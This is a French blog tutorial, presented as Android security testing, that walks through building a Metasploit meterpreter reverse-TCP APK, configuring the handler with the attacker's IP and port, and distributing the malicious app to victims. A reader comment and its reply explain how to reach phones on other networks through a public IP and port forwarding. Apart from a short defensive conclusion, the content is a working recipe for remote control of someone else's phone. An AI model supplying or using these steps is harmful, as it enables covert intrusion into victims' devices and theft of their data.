Testez la sécurité de votre Smartphone Android avec Metasploit

De nos jours, les utilisateurs de mobiles augmentent de jour en jour, la menace à la sécurité augmente également avec la croissance de ses utilisateurs. Notre tutoriel pour aujourd’hui est de savoir comment tester la sécurité de votre Smartphone Android à l’aide de Metasploit. Pourquoi avons-nous choisi le téléphone Android pour ce tutoriel? tout simplement parce que, récemment, le téléphone Android se développe très rapidement dans le monde entier. Ici, en Chine, vous pouvez obtenir un téléphone Android pour seulement US $ 30, c’est l’une des raisons pour lesquelles Android se développe rapidement.

Qu’est-ce que Android? selon wikipedia:

Android est un système d’exploitation basé sur le noyau Linux et conçu principalement pour les appareils mobiles à écran tactile tels que les smartphones et les tablettes. Initialement développé par Android, Inc., financé par Google et acheté plus tard en 2005, Android a été dévoilé en 2007 en même temps que la fondation de l’Open Handset Alliance: un consortium de sociétés de matériel, de logiciels et de télécommunications dispositifs.

et qu’est ce que l’APK? selon wikipedia:

Le fichier de package d’application Android (APK) est le format de fichier utilisé pour distribuer et installer les logiciels d’application et les logiciels intermédiaires sur le système d’exploitation Android de Google. très similaire à un package MSI dans Windows ou à un package Deb dans les systèmes d’exploitation basés sur Debian comme Ubuntu.

Voici quelques informations initiales pour ce tutoriel:

Adresse IP de l’attaquant: 192.168.8.94

Port d’attaque pour recevoir la connexion: 443

Exigences:

1. Framework Metasploit (nous utilisons Kali Linux 1.0.6 dans ce tutoriel)

À lire aussi  Comment récupérer des photos supprimés d'un smartphone Android ?

2. Smartphone Android (nous utilisons HTC One android 4.4 KitKat)

Étape par étape : Android et Metasploit

1. Ouvrir le terminal (CTRL + ALT + T)

2. Nous utiliserons le framework Metasploit pour créer un exploit pour ce tutoriel.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

Comme décrit ci-dessus, l’adresse IP de l’attaquant est 192.168.8.94. Ci-dessous, notre capture d’écran lors de l’exécution de la commande

Piratage Android

3. Comme notre charge utile est reverse_tcp où l’attaquant s’attend à ce que la victime se reconnecte à la machine de l’attaquant, l’attaquant doit configurer le gestionnaire pour qu’il puisse gérer les connexions entrantes au port indiqué ci-dessus. Tapez msfconsole pour accéder à la console Metasploit.

Piratage Android

Info:

use exploit/multi/handler –> we will use Metasploit handler

set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. L’étape suivante consiste à configurer le commutateur pour la charge utile Metasploit que nous avons déjà spécifiée à l’étape 3.

Piratage Android

Info:

set lhost 192.168.8.94 –> attacker IP address

set lport 443 –> port to listen the reverse connection

exploit –> start to listen incoming connection

5. L’attaquant a déjà le fichier APK et maintenant il le distribuera (je n’ai pas besoin de décrire comment distribuer ce fichier, Internet est le bon endroit pour la distribution).

6. Histoires courtes La victime (moi-même) télécharge le fichier malveillant de l’APK et l’installe. Après avoir ouvert l’application, la console Metasploit de l’attaquant a quelque chose comme ceci:

Piratage Android

7. Cela signifie que l’attaquant est déjà à l’intérieur du smartphone Android de la victime et qu’il peut tout faire avec le téléphone de la victime.

À lire aussi  Comment puis-je devenir un professionnel dans la sécurité informatique ?

Android piratage Metasploit

Voyez la vidéo ci-dessous si vous ne comprenez pas le didacticiel pas à pas Hacking Android Smartphone utilisant Metasploit ci-dessus:

Conclusion:

1. N’installez pas les fichiers APK à partir d’une source inconnue.

2. Si vous voulez vraiment installer les fichiers APK à partir d’une source inconnue, assurez-vous de pouvoir afficher, lire et examiner le code source. L’image ci-dessous est le code source de nos APK malveillants dans ce tutoriel.

Android Piratage Metasploit


Articles similaires

5 commentaires

  1. bonjour pour cette attaque suis-je obliger d’étre sur le méme réseau comment doit-on procéder si le tel et le pc ne sont pas connecter a la méme box ? (je doit entrée l’ip externe quant je rentre le lhost)

    1. Bonjour @Christophe,

      Pour que attaquer un smartphone qui n’est pas sur le meme reseau que toi, dans la valeur LHOST, tu ne mets pas ton @ip privée mais plutot ton @ip publique et ensuite tu fais la redirection de port dans l’interface de ton routeur.
      j’esprère que tu sais comment proceder pour la redirection de ports

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Bouton retour en haut de la page